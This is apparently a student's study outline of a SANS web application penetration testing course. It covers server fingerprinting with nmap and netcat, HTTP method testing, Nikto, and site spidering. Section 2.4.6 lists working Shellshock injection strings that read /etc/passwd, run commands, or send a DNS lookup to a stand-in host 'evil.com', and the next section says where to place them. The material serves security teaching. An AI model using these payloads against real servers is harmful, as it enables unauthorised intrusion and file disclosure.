Sans 542

Download as txt, pdf, or txt
Download as txt, pdf, or txt
You are on page 1of 2

2: Configuration, identity, authentication testing.

2.1: Nmap
2.1.1: NSE, -O (operating system) and -sV (service version) detection
2.1.2: example of scanning scanme.nmap.org
2.1.3: Server profiling: find out version of web server, ssl, load balancing, etc.
2.1.4: Finding server version through different methods
2.1.5: Nmap, use -sV
2.1.6: Use netcat to get server connection strings, http headers
2.1.7: Netcat example of true and false server headers
2.1.8: Look up website on Netcraft
2.1.9: More in depth detail from Netcraft: headers, netblock info, ownership info

2.2: Exercise: get server info using netcat and nmap

2.3: Testing software configuration


2.3.1: Need to fingerprint web server
2.3.2: Can use HTTP methods to do this
2.3.3: Need to understand config of underlying server machine, web server daemon,
which features are available (PHP, HTTP methods accepted) and if there are default
pages
2.3.4: See what HTTP methods are accepted, interesting ones are PUT, DELETE,
CONNECT, TRACE, OPTIONS
2.3.5: Netcat can iterate through the methods, manually or with a bash script
2.3.6: Default pages can identify the server software. Docs are commonly left on
servers. Try accessing via IP address not hostname, and Nikto is good for
discovering these
2.3.7: Nikto uses a database of items to scan for on the server - server-side
scripts and programs, MD5 hashes of favicons for servers, default files - beware of
false positives

2.4: Shellshock
2.4.1: Important to look for software configuration flaws,using e.g. Nikto
2.4.2: 2014 a good year for vulns, heartbleed, shellshock and drupalgeddon
2.4.3: Shellshock due to the way Bash handled functions defined within environment
variables and exported to child process, which would import them and run arbitrary
commands.
2.4.4: Remotely exploitable: adversary interacts with server, input from connection
used by server in bash env variables, adversary controls input and makes commands
to be executed.
2.4.5: On the web, CGI scripts can use #!/bin/bash, and often /bin/sh is a pointer
to /bin/bash. Also functions backed by popen() or system() also vulnerable in apps
written in Python, PHP and other interpreted languages.
2.4.6: Injection strings (first two injection, second two blind injection):
() { 42;};echo;/bin/cat /etc/passwd
() { 42;};echo;/usr/bin/id
() { 42;};echo; ping -c 4 10.42.42.42
() { 42;};echo; nslookup abc123.evil.com
2.4.7: This can go in user-agents, cookies, referer entries. The () { 42;} prefix
indicates a function stored in an env variable. Inside the curly braces is what the
function will do, 42 is arbitrary here as it doesn't get executed (can just be
colon in there). The echo is padding - not always necessary for shellshock but for
HTTP headers it reduces likelihood of server error. The last part is the command.
2.4.8: Bash continues parsing past the ;} and executes what it finds (this is the
flaw)
2.4.9: Visualisation of shellshock injection

2.5: Exercise: Shellshock, using burp to intercept and change user-agent string.
Also use curl to set user-agent.
2.6: Spidering web applications.
2.6.1: Spidering is important info gathering according to OTG
2.6.2: Involves following links to download the site, offline analyse to find
security weaknesses in code, contact details, keywords for password guessing,
confidential data etc.
2.6.3: Common to spider multiple times as you need a map of the site. Automated
tools may failis site is complex or has issues with multiple requests, so might
have to do it manually.
2.6.4: Robots.txt can tell spiders what they're allowed to acces based on user-
agent. Meta tags can also be placed on pages: First two to stop caching (need both
as respected by different clients), second two to control search engine spiders.
<meta http-equiv="pragma" content="no-cache">
<meta http-equiv="cache-control" content="no-cache">
<meta name="robots" content="index,nofollow">
<meta name="googlebot" content="noarchive">
2.6.5: ZAP can spider websites (select attack->spider). Client side dynamically
generated links can be missed, so a separate dedicated AJAX spider can be employed.
2.6.6: ZAP example.
2.6.7: Wappalyzer can provide insight into OS, web server, web apps, languages,
frameworks and APIs leveraged.
2.6.8: Wappalyzer browser extension gives icons of what stuff is in use. Beware, it
sends data back to wappalyzer website.
2.6.9: ZAP has a "Technology Detection" extension that implements Wappalyzer code
but it's not release quality and doesn't implement all functionality as browser is
required.
2.6.10: It's a marketplace extension and creates a new tab. Example illustrated.
2.6.11: ZAP forced browse, based on (now inactive) DirBuster, does a brute force
browse using wordlist. Can do it for a site, a directory or directory + its
children.
2.6.12: Burp can spider similar to ZAP, use spider tab+"spider running" or right
click target and click "spider this host"
2.6.13: Can use wget: respects robots.txt, -r will recurse through discovered links
and -l can set recursion depth
2.6.14: Specialized spidering tools are available, CeWL (https://digi.ninja)
spiders then creates a word list for dictionary attack, uses EXIF data.

2.7: Exercise - spidering a website with wget (compare results to ls listing on


server to see what is missed), ZAP, burp (401s not visible unless you click filter
options) and CeWL

2.8: Analyzing spidering results.


2.8.1: After we have spidered a site, we analyze the results, looking for comments
that reveal useful or sensitive info, commented code and links, disabled
functionality, and linked servers (content or application servers).
2.8.2: HTML comments can include developer notes, explanations of functionality or
variables, and usernames/passwords. These should be moved to server-side comments
(e.g. in the PHP code).
2.8.3: Disabled functionality reveals previous or future versions of the site,
which may get invoked and contain security weaknesses, which could undermine the
whole application.
2.8.4:

You might also like